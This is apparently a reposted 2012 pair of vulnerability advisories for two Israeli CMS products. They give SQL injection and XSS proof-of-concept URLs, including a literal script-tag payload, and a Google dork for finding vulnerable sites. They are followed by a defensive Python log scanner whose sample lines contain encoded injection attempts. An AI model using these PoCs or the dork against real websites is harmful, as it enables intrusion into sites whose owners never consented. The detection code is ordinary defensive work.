January 6, 2012

[RECONNAISSANCE] SQL Injection 6 January

DIGIT Israel Cms SQL Injection / XSS Multiple Vulnerability 
Author : BHG Security Center
Date : 2012-01-05
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG


[PoC] : /website_path/Default.asp?sType=0&PageId=[Sqli]


 Enter In Search Box XSS Code 
<FORM action="Default.asp?PageId=-1" method=POST id=searchFORM name=searchFORM style="margin:0;padding:0"><INPUT type="hidden" value="" name="txtSEARCH">
</FORM>

[PoC] : Http://[victim]/path/Default.asp

Note : There are vulnerabilities in the search field that you can use


 Timeline:
~~~~~~~

- 02 - 01 - 2012 bug found.
- 03 - 01 - 2012 vendor contacted, but no response.
- 05 - 01 - 2012 Advisories released.

 Important Notes:
~~~~~~~~~~~~~

- The vendor did not respond to email or phone. As there is no contact form or email address on the website, we used all the email addresses found by searching Google, such as support, info, and so on.



Priza Israel Cms SQL Injection / XSS Multiple Vulnerability

# Exploit Title: Priza Israel Cms SQL Injection / XSS Multiple Vulnerability
# Date: 2012-01-05 [GMT +7]
# Author: BHG Security Center
# Software Link: http://www.priza.co.il/
# Vendor Response(s): They didn't respond to the emails.
# Dork: intext:"Powered by Priza"
# Version : [0.0.2]
# Tested on: ubuntu 11.04
# CVE : -
# Finder(s):
    - Net.Edit0r (Net.edit0r [at] att [dot] net)
    - G3n3Rall (Ant1_s3cur1ty [at] yahoo [dot] com)

Author : BHG Security Center
Date : 2012-01-05
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG
---------------------------------------------------------------------------

[PoC] : /website_path/index.asp?p_id=201&id=[SQLi]

[PoC] : /website_path/index.asp?page_id=[SQLi]

[PoC] : /website_path/volumes.asp?id=18

[PoC] : /website_path/index.asp?action=find&page_id=28&string=[Xss]

[PoC] : Http://[victim]/path/index.asp?p_id=201&id=[SQLi]

[PoC] : Http://[victim]/path/index.asp?action=find&page_id=28&string="><script>alert(0)</script>


 Timeline:
~~~~~~~
- 02 - 01 - 2012 bug found.
- 03 - 01 - 2012 vendor contacted, but no response.
- 05 - 01 - 2012 Advisories released.

 Important Notes:
~~~~~~~~~

- The vendor did not respond to email or phone. As there is no contact form or email address on the website, we used all the email addresses found by searching Google, such as support, info, and so on.
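
Operators of either CMS can watch for requests that abuse the parameters listed in the two advisories above. The following log check is an added example, not part of the advisories or the vendors' code; the log layout (date, time, method, URI stem, URI query, status), the function names and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl

# Parameters named in the two advisories; these should only ever carry an integer.
NUMERIC_PARAMS = {"pageid", "page_id", "p_id", "id", "stype"}
# Free-text search parameter named in the Priza advisory.
TEXT_PARAMS = {"string"}
INTEGER = re.compile(r"-?\d{1,9}")  # the search form itself posts to PageId=-1
MARKUP = re.compile(r'[<>"]')

# Constructed sample log (assumed layout: date time method uri-stem uri-query status).
SAMPLE_LOG = """\
2012-01-06 10:00:01 GET /Default.asp sType=0&PageId=12 200
2012-01-06 10:00:02 GET /Default.asp sType=0&PageId=12%27 500
2012-01-06 10:00:03 GET /index.asp action=find&page_id=28&string=annual+report 200
2012-01-06 10:00:04 GET /index.asp action=find&page_id=28&string=%22%3E%3Cscript%3E 200
2012-01-06 10:00:05 GET /Default.asp PageId=-1 200
"""


def check_query(query):
    """Return (param, reason) findings for one logged query string."""
    findings = []
    # parse_qsl percent-decodes values, so encoded input is inspected in clear.
    for name, value in parse_qsl(query, keep_blank_values=True):
        key = name.lower()
        if key in NUMERIC_PARAMS and not INTEGER.fullmatch(value):
            findings.append((name, "not-integer"))
        elif key in TEXT_PARAMS and MARKUP.search(value):
            findings.append((name, "markup"))
    return findings


def scan(log_text):
    """Return (line_no, uri_stem, param, reason) for every suspicious request."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        fields = line.split()
        if line.startswith("#") or len(fields) < 5:
            continue  # skip log header directives and short lines
        for param, reason in check_query(fields[4]):
            hits.append((line_no, fields[3], param, reason))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule belongs in the application itself, where the numeric parameters should be converted to integers and bound as query parameters rather than concatenated into SQL.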
